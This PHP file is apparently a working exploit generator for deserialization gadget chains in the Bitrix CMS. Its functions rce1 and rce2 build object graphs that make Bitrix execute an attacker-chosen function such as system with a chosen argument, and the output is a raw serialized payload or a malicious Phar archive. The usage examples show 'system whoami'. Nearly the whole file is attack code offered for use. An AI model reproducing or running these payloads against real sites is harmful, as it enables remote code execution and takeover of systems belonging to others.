<?php
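/**
 * Declares one stand-in class per entry of $items at runtime, via eval().
 *
 * $items maps a (possibly namespaced) class name to a list of property
 * names. A leading '*' makes the property private, a leading '#' makes it
 * protected, anything else is public. Each generated class also gets a
 * __set() that writes straight through to the declared property, so callers
 * can assign the non-public properties from outside the class.
 *
 * A name that is already declared is skipped: re-declaring a class is a
 * fatal error, and skipping lets gen() be called more than once with
 * overlapping entries.
 *
 * @param array<string, list<string>> $items  class name => property specs
 * @throws InvalidArgumentException when a property spec has no name
 *                                  (empty string, or only a '*'/'#' sigil)
 */
function gen($items) {
    foreach ($items as $name => $props) {
        // class_exists(..., false): check without triggering autoloaders.
        if (class_exists($name, false)) {
            continue;
        }
        $code = '';
        if (strpos($name, "\\") !== false) {
            $parts = explode("\\", $name);
            $cls = array_pop($parts);
            $ns = implode("\\", $parts);
            // A namespace declaration has to be the first statement of the eval'd code.
            $code .= "namespace $ns;\n";
        } else {
            $cls = $name;
        }
        $code .= "class $cls {\n";
        foreach ($props as $prop) {
            $prop = (string) $prop;
            if ($prop === '') {
                throw new InvalidArgumentException("Empty property name for class $name");
            }
            // Same sigil in both branches is compared strictly; the original mixed == and ===.
            if ($prop[0] === '*') {
                $visibility = 'private';
                $field = substr($prop, 1);
            } elseif ($prop[0] === '#') {
                $visibility = 'protected';
                $field = substr($prop, 1);
            } else {
                $visibility = 'public';
                $field = $prop;
            }
            if ($field === '') {
                throw new InvalidArgumentException("Property spec '$prop' for class $name has no name");
            }
            $code .= "\t$visibility \$$field;\n";
        }
        // __set lets the caller populate private/protected properties from outside.
        $code .= "\tfunction __set(\$name, \$value) { \$this->{\$name} = \$value; }\n";
        $code .= "}";
        // The class source is assembled only from the $items the caller hard-codes;
        // eval() on names coming from outside the program would be unsafe.
        eval($code);
    }
}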
/**
 * Builds the object graph for gadget "rce1" and returns its root.
 *
 * Declares stand-in classes (via gen()) for the three Bitrix class names
 * listed below, then wires them: the root Result has isSuccess = false and
 * errors pointing at a DataProvider whose data is the array [$a, 'check'],
 * where $a is a CAdminDraggableBlockEngine with engines = [['check' => $func]]
 * and args = $arg. The CLI code below serializes the returned Result either
 * raw or as Phar metadata.
 *
 * Both rce1() and rce2() declare Bitrix\Main\Entity\Result; the CLI dispatch
 * below calls only one of them per run.
 *
 * @param mixed $func  stored under the 'check' key of ->engines
 * @param mixed $arg   stored in ->args
 * @return object the Bitrix\Main\Entity\Result stub that roots the graph
 */
function rce1($func, $arg) {
gen([
'Bitrix\Main\Entity\Result' => ['#isSuccess', '#errors'],
'Bitrix\Main\UserConsent\DataProvider' => ['#data'],
'CAdminDraggableBlockEngine' => ['#engines', '#args'],
]);
// Protected properties are reachable through the __set() that gen() adds.
$a = new CAdminDraggableBlockEngine();
$a->engines = array(array('check' => $func));
$a->args = $arg;
$dp = new Bitrix\Main\UserConsent\DataProvider();
// Array-callable shape: [object, method name].
$dp->data = array($a, 'check');
$res = new Bitrix\Main\Entity\Result();
$res->errors = $dp;
$res->isSuccess = false;
return $res;
}
/**
 * Builds the object graph for gadget "rce2" and returns its root.
 *
 * Declares stand-in classes (via gen()) for the three Bitrix class names
 * listed below, then wires them: the root Result has isSuccess = false and
 * errors pointing at a Dictionary whose values is an ArrayResult with
 * resource = [[$arg]] and converters = [$func]. The CLI code below serializes
 * the returned Result either raw or as Phar metadata.
 *
 * Both rce1() and rce2() declare Bitrix\Main\Entity\Result; the CLI dispatch
 * below calls only one of them per run.
 *
 * @param mixed $func  stored as the single entry of ->converters
 * @param mixed $arg   stored as the single cell of the single ->resource row
 * @return object the Bitrix\Main\Entity\Result stub that roots the graph
 */
function rce2($func, $arg) {
gen([
'Bitrix\Main\Entity\Result' => ['#isSuccess', '#errors'],
'Bitrix\Main\DB\ArrayResult' => ['#resource', '#converters'],
'Bitrix\Main\Type\Dictionary' => ['#values'],
]);
// Protected properties are reachable through the __set() that gen() adds.
$ar = new Bitrix\Main\DB\ArrayResult();
$ar->resource = array(array($arg));
$ar->converters = array($func);
$dict = new Bitrix\Main\Type\Dictionary();
$dict->values = $ar;
$res = new Bitrix\Main\Entity\Result();
$res->errors = $dict;
$res->isSuccess = false;
return $res;
}
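// CLI entry point: build the selected gadget graph and emit it either as a raw
// serialize() string on stdout or as the metadata of a newly created Phar.
// Usage errors now exit with a non-zero status so callers can detect them.
if (count($argv) !== 5) {
    echo "Usage: php gadgets.php rce1|rce2 func arg raw|phar-name\n";
    echo "Example: php gadgets.php rce1 system whoami raw\n";
    echo " php gadgets.php rce2 system whoami test.phar\n";
    exit(1);
}
// $argv[0] is the script path and is not needed.
list(, $gadget, $func, $arg, $enc) = $argv;
switch ($gadget) {
    case 'rce1':
        $data = rce1($func, $arg);
        break;
    case 'rce2':
        $data = rce2($func, $arg);
        break;
    default:
        echo "Unknown gadget: $gadget\n";
        exit(1);
}
switch ($enc) {
    case 'raw':
        echo serialize($data);
        break;
    default:
        // Any value other than 'raw' is taken as the path of the Phar to write.
        // Phar::__construct refuses to create an archive while phar.readonly is enabled.
        $phar = new Phar($enc);
        $phar->startBuffering();
        $phar->addFromString('test.txt', 'text');
        // NOTE(review): the stub's closing tag reads "? >" with a space; the
        // string is kept exactly as written — confirm this is intended.
        $phar->setStub('<?php __HALT_COMPILER(); ? >');
        // Phar metadata is stored in serialized form inside the archive.
        $phar->setMetadata($data);
        $phar->stopBuffering();
        break;
}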